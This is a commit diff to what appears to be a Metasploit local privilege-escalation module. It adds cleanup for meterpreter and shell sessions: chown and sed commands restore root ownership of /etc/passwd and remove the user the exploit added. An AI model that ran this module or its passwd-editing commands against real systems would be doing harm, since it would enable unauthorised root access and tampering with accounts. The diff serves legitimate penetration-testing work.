Support cleanup for meterpreter sessions

MS-2855/keylogger-mettle-extension
Brendan Coles 2018-02-04 04:38:53 +00:00
parent 74ab02f27b
commit e158ccb20b
1 changed files with 57 additions and 8 deletions

View File

@ -174,16 +174,65 @@ class MetasploitModule < Msf::Exploit::Local
end
def on_new_session(session)
# Reinstate /etc/passwd ownership
if session.type.to_s.eql? 'meterpreter'
session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
end
# Reinstate /etc/passwd root ownership and remove new user
root_owns_passwd = false
new_user_removed = false
if session.type.to_s.eql? 'meterpreter'
# Reinstate /etc/passwd root ownership
session.sys.process.execute '/bin/sh', "-c \"chown root:root #{@chown_file}\""
# Remove new user
session.sys.process.execute '/bin/sh', "-c \"sed -i 's/^#{@username}:.*$//g' #{@chown_file}\""
# Wait for clean up
Rex.sleep 5
# Check root ownership
passwd_stat = session.fs.file.stat(@chown_file).stathash
if passwd_stat['st_uid'] == 0 && passwd_stat['st_gid'] == 0
root_owns_passwd = true
end
# Check for new user in /etc/passwd
passwd_contents = session.fs.file.open(@chown_file).read.to_s
unless passwd_contents.include? "#{@username}:"
new_user_removed = true
end
elsif session.type.to_s.eql? 'shell'
# Reinstate /etc/passwd root ownership
session.shell_command_token "chown root:root #{@chown_file}"
# Remove new user
session.shell_command_token "sed -i 's/^#{@username}.*$//g' #{@chown_file}"
passwd = session.shell_command_token "grep #{@username} #{@chown_file}"
if passwd.include? @username
print_warning "Could not remove user '#{@username}' from #{@chown_file}"
session.shell_command_token "sed -i 's/^#{@username}:.*$//g' #{@chown_file}"
# Check root ownership
passwd_owner = session.shell_command_token "ls -l #{@chown_file}"
if passwd_owner.to_s.include? 'root'
root_owns_passwd = true
end
# Check for new user in /etc/passwd
passwd_user = session.shell_command_token "grep '#{@username}:' #{@chown_file}"
unless passwd_user.to_s.include? "#{@username}:"
new_user_removed = true
end
end
unless root_owns_passwd
print_warning "Could not reinstate root ownership of #{@chown_file}"
end
unless new_user_removed
print_warning "Could not remove user '#{@username}' from #{@chown_file}"
end
rescue => e
print_error "Error during cleanup: #{e.message}"
ensure
super
end
end